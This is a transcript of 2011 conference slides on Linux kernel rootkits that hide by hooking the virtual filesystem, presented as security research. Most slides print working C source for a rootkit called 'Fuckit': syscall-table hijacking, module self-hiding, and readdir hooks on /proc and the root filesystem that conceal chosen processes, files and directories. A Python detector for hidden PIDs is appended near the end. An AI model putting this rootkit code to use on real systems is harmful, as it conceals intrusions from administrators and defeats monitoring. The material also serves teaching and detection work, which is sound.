Confraria Security & IT - Lisbon Set 29, 2011
Transcript

  • Linux rootkits without syscall patching (the VFS way)
    Confraria SECURITY & IT – 28 Set 2011
  • #> whoami
    • Ricardo Mourato – 25 yo
    • Computer Science Degree
    • InfoSec & SuperBock Stout addicted
    • OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic
    • Java, .Net, Python, Ruby, C, C++, ASM lover
    • Windows (all versions), Perl (all versions) and printers (yes, they came from hell!) hater
    • root, right here :)
    2
  • Agenda
    • Linux rootkits – brief talk
    • Linux 2.{5,6} kernel – what changed?
    • The Virtual Filesystem (VFS)
    • Meet /proc, our friend!
    • Introducing
    • Show time
    • Retrospect
    • Questions & Answers
    3
  • Linux rootkits – how they were?
    • In the beginning…
    • User-land trojaned binaries, mostly
    • Easy to spot
    • Easy to code
    • However, hard to hide!
    • LRK5 was a good bastard…
    4
  • Linux rootkits – how they were?
    • Not so far away…
    • The kernel-land approach
    • Loadable Kernel Modules or /dev/kmem “patching”
    • Syscall patching
    • Easy to code
    • Less easy to find
    Adore & suckit were also good bastards!
    5
  • Linux rootkits – how they were?
    /* classic 2.4-style syscall table patching: swap the open() slot */
    #include <linux/module.h>
    extern void *sys_call_table[];
    static void *original_call;   /* the real sys_open, saved for later */
    asmlinkage long evil_open(const char __user *, int, int);   /* replacement handler (not shown on the slide) */
    int init_module(void) {
        original_call = sys_call_table[__NR_open];
        sys_call_table[__NR_open] = evil_open;
        return 0;
    }
    6
  • Linux 2.{5,6} – what changed?
    • Main change:
    • OMG! sys_call_table[] is no longer exported!!!
    • Even if you find it, it will be read-only
    • Workaround:
    • Find the IDT
    • Find the 0x80 interrupt gate
    • Get the system_call() function location
    • Use gdb kung fu and search memory for sys_call_table[] within this function
    7
  • Linux 2.{5,6} – what changed?
    $ gdb -q /usr/src/linux/vmlinux
    (no debugging symbols found)...
    (gdb) disass system_call

    0xc0106bf4 : call *0xc01e0f18(,%eax,4)

    (gdb) print &sys_call_table
    $1 = ( *) 0xc01e0f18
    8
  • The Virtual Filesystem
    • Is the primary interface to the underlying filesystems (common file model)
    • Exports a set of interfaces for every individual filesystem
    • Each filesystem must “implement” this interface in order to fit the common file model
    • Some interesting players are:
    • struct dentry;
    • struct file_operations;
    • struct inode_operations;
    9
  • /proc is our friend
    • So… everything in Linux “is a file”, right?
    • Including the ones located at /proc, even if “in memory”
    • And… most user-land tools rely on /proc to get information!
    • These tools include:
    • ps
    • netstat
    • top
    • mount
    • And many, many others…
    • Remember struct file_operations?
    10
  • Introducing Fuckit…
    • Fu Control Kit (just in case!)
    • A research-born VFS rootkit capable of:
    • Hiding itself – no sh*t, Sherlock?
    • Hiding processes
    • Hiding files and directories
    • TTY sniffing
    11
  • Module hiding
    • Modules are linked together in a doubly linked list maintained by the kernel
    • The kernel has internal functions to “unlink” unloaded modules from the list
    • Just use them wisely
    12
  • Module hiding
    #include <linux/module.h>
    #include <linux/list.h>
    static struct module *m = THIS_MODULE;
    void hideme(void)
    {
        /* drop the module's sysfs object (/sys/module/<name>) ... */
        kobject_del(&m->mkobj.kobj);
        /* ... and unlink it from the module list that lsmod and /proc/modules walk */
        list_del(&m->list);
    }
    13
  • “Hook” the Virtual Filesystem (/proc)
    #include <linux/fs.h>
    #include <linux/proc_fs.h>
    static struct file_operations *proc_fops;   /* remember again? */
    static struct proc_dir_entry *key, *proc;
    static int (*original_proc_readdir)(struct file *, void *, filldir_t);
    void hook_proc(void)
    {
        /* we are not /proc yet: create a throwaway entry under it */
        key = create_proc_entry(KEY, 0666, NULL);
        if (!key)
            return;
        /* now we become /proc :) the new entry's parent is the /proc root */
        proc = key->parent;
        /* save the original, we will need it later (the cast drops the const) */
        proc_fops = (struct file_operations *)proc->proc_fops;
        original_proc_readdir = proc_fops->readdir;
        /* the hook */
        proc_fops->readdir = fuckit_proc_readdir;
    }
    14
  • “Hook” the Virtual Filesystem (/)
    #include <linux/fs.h>
    static struct file *f;
    static int (*original_root_readdir)(struct file *, void *, filldir_t);
    int hook_root(void)
    {
        f = filp_open("/", O_RDONLY, 0600);
        if (IS_ERR(f))
            return -1;
        original_root_readdir = f->f_op->readdir;
        /* f_op is the filesystem's shared directory file_operations (declared const,
           hence the cast), so this patches readdir for every directory on that filesystem */
        ((struct file_operations *)f->f_op)->readdir = fuckit_root_readdir;
        filp_close(f, NULL);
        return 0;
    }
    15
  • Process hiding
    #include <linux/fs.h>
    #include <linux/string.h>
    /* HIDDEN_PID and KEY are macros defined elsewhere in the module */
    static filldir_t original_filldir;   /* one shared global: concurrent readdir() callers clobber it */
    static int fuckit_proc_filldir(void *__buf, const char *name, int namelen,
                                   loff_t offset, u64 ino, unsigned d_type)
    {
        /* our hidden PID (and our own /proc entry): drop them from the listing */
        if (!strcmp(name, HIDDEN_PID) || !strcmp(name, KEY))
            return 0;
        return original_filldir(__buf, name, namelen, offset, ino, d_type);
    }
    static int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir)
    {
        /* save the caller's filldir, we will need to return through it later */
        original_filldir = filldir;
        return original_proc_readdir(filp, dirent, fuckit_proc_filldir);
    }
    16
  • File and Directory hiding
    #include <linux/fs.h>
    #include <linux/string.h>
    /* HIDDEN_DIR is a macro defined elsewhere in the module */
    static filldir_t original_root_filldir;
    static int fuckit_root_filldir(void *__buf, const char *name, int namelen,
                                   loff_t offset, u64 ino, unsigned d_type)
    {
        /* if it is our hidden file/directory return nothing! :)
           name is not NUL-terminated here, so compare the full length; a bare
           strncmp(name, HIDDEN_DIR, namelen) would also match every entry whose
           name is a prefix of HIDDEN_DIR */
        if (namelen == strlen(HIDDEN_DIR) && strncmp(name, HIDDEN_DIR, namelen) == 0)
            return 0;
        return original_root_filldir(__buf, name, namelen, offset, ino, d_type);
    }
    static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir)
    {
        /* save the caller's filldir, we will need to return through it later */
        original_root_filldir = filldir;
        return original_root_readdir(filp, dirent, fuckit_root_filldir);
    }
    17
  • Seeing is believing
    18
  • Retrospect
    • Syscall patching in the 2.6 kernel is a true “pain in the a**”
    • VFS hooks also do the job!
    • It is a good approach, however it has some cons
    • It is possible to “brute force” /proc for hidden PIDs
    • You should let the Linux scheduler do this job!
    • Hypervisor rootkits will kill -9 every kernel rootkit on earth!
    19
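The “brute force /proc” check from the Retrospect slide, written out as an added example (not the talk's code): a filldir hook only filters what readdir() returns, so listing /proc and then probing every PID up to pid_max by direct path lookup gives two views of the same table, and any PID the lookup confirms but the listing omitted is hidden. The function names and the status-file parsing are my own; the script assumes a Linux host with a readable /proc.

```python
"""Find PIDs that a readdir() hook hides from /proc (constructed detector)."""
import os
from typing import Callable, Iterable, Optional, Set


def tgid_from_status(text: str) -> Optional[int]:
    """Parse the 'Tgid:' line of a /proc/<pid>/status file."""
    for line in text.splitlines():
        if line.startswith("Tgid:"):
            return int(line.split(":", 1)[1])
    return None


def is_process_by_lookup(pid: int) -> bool:
    """Direct lookup of /proc/<pid>/status: this path goes through lookup(),
    not readdir(), so a readdir-only hook cannot filter it.  Only thread group
    leaders count, because a thread's TID resolves here but is never listed."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            return tgid_from_status(fh.read()) == pid
    except OSError:
        return False


def listed_pids(proc_root: str = "/proc") -> Set[int]:
    """PIDs as readdir() reports them: the view a hooked filldir controls."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def find_hidden_pids(listed: Iterable[int], probe: Callable[[int], bool],
                     pid_max: int) -> Set[int]:
    """Brute-force the PID space: every PID the probe confirms that the
    readdir() listing omitted."""
    seen = set(listed)
    return {pid for pid in range(1, pid_max + 1) if pid not in seen and probe(pid)}


def read_pid_max(path: str = "/proc/sys/kernel/pid_max") -> int:
    """Upper bound of the PID space; falls back to the historical default."""
    try:
        with open(path) as fh:
            return int(fh.read())
    except OSError:
        return 32768


if __name__ == "__main__":
    hidden = find_hidden_pids(listed_pids(), is_process_by_lookup, read_pid_max())
    print("PIDs hidden from readdir:", sorted(hidden) or "none")
```

Processes spawned between the listing and the probe show up as false positives, so re-list and keep only PIDs still missing before reporting; a rootkit that also hooks lookup() defeats this probe, which is why the slide points at the scheduler (kill(pid, 0)) as the next source of truth.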
  • References
    • IBM developerWorks, “Anatomy of the Linux filesystem”. http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/ [Jan 25, 2011]
    • WangYao, “Rootkit on Linux x86 v2.6” [Apr 21, 2009]
    • Dump, “hideme (ng)”. http://trace.dump.cz/projects.php [Jan 25, 2011]
    • Ubra, “Process Hiding & The Linux scheduler”. http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011]
    20
  • Questions & Answers
    ?
    22
